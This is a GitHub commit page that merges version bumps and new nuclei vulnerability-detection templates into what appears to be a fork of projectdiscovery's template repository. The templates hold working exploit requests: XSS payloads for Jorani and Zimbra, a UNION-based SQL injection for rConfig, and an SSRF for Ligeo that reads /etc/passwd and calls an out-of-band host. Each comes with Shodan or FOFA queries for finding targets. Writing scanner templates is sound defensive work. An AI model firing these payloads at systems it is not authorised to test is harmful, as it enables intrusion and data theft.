-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #1 from projectdiscovery/main
rudderstack-write-key.yaml
- Loading branch information
Showing
18 changed files
with
248 additions
and
38 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
4.4.4 | ||
4.4.5.1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
8.1.7 | ||
8.1.8 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
2.2.1 | ||
2.2.2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
3.1.2 | ||
3.1.3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
2.6.4 | ||
2.6.5 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
4.07 | ||
4.08 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
3.36.0 | ||
3.37.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
6.3.2 | ||
6.4.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,50 @@ | ||
id: CVE-2018-15917 | ||
|
||
info: | ||
name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting | ||
author: ritikchaddha | ||
severity: medium | ||
description: | | ||
Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language. | ||
reference: | ||
- https://www.exploit-db.com/exploits/45338 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2018-15917 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 5.4 | ||
cve-id: CVE-2018-15917 | ||
cwe-id: CWE-79 | ||
metadata: | ||
max-request: 2 | ||
verified: true | ||
shodan-query: title:"Login - Jorani" | ||
tags: cve,cve2018,jorani,xss | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
GET /session/login HTTP/1.1 | ||
Host: {{Hostname}} | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '<script>alert(document.domain)</script>' | ||
- '_jorani' | ||
condition: and | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,41 @@ | ||
id: CVE-2020-10220 | ||
|
||
info: | ||
name: rConfig 3.9 - SQL injection | ||
author: ritikchaddha | ||
severity: critical | ||
description: | | ||
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. | ||
reference: | ||
- http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220 | ||
classification: | ||
cve-id: CVE-2020-10220 | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cwe-id: CWE-89 | ||
metadata: | ||
max-request: 1 | ||
verified: true | ||
shodan-query: title:"rConfig" | ||
tags: cve,cve2020,rconfig,sqli | ||
|
||
variables: | ||
num: "999999999" | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '{{md5({{num}})}}' | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
id: CVE-2021-46107 | ||
|
||
info: | ||
name: Ligeo Archives Ligeo Basics - Server Side Request Forgery | ||
author: ritikchaddha | ||
severity: high | ||
description: | | ||
Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. | ||
reference: | ||
- https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46107 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2021-46107 | ||
cwe-id: CWE-918 | ||
metadata: | ||
fofa-query: title="Ligeo" | ||
max-request: 3 | ||
shodan-query: title:"Ligeo" | ||
verified: true | ||
tags: cve,cve2021,ligeo,ssrf,lfr | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
GET /archive/download?file=file:///etc/passwd HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" | ||
- "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,52 @@ | ||
id: CVE-2023-34192 | ||
|
||
info: | ||
name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting | ||
author: ritikchaddha | ||
severity: high | ||
description: | | ||
Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. | ||
reference: | ||
- https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA | ||
- https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192 | ||
classification: | ||
cve-id: CVE-2023-34192 | ||
metadata: | ||
fofa-query: icon_hash="475145467" | ||
max-request: 2 | ||
shodan-query: http.favicon.hash:475145467 | ||
tags: cve,cve2023,zimbra,xss,authenticated | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /zimbra/ HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
loginOp=login&username={{username}}&password={{password}}&client=preferred | ||
- | | ||
GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1 | ||
Host: {{Hostname}} | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body_2 | ||
words: | ||
- "<script>alert(document.domain)</script>" | ||
- "zimbra" | ||
condition: and | ||
|
||
- type: word | ||
part: header_2 | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
part: header_2 | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -34,3 +34,8 @@ http: | |
- type: status | ||
status: | ||
- 200 | ||
|
||
extractors: | ||
- type: json | ||
json: | ||
- .applinks.details[].appID |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.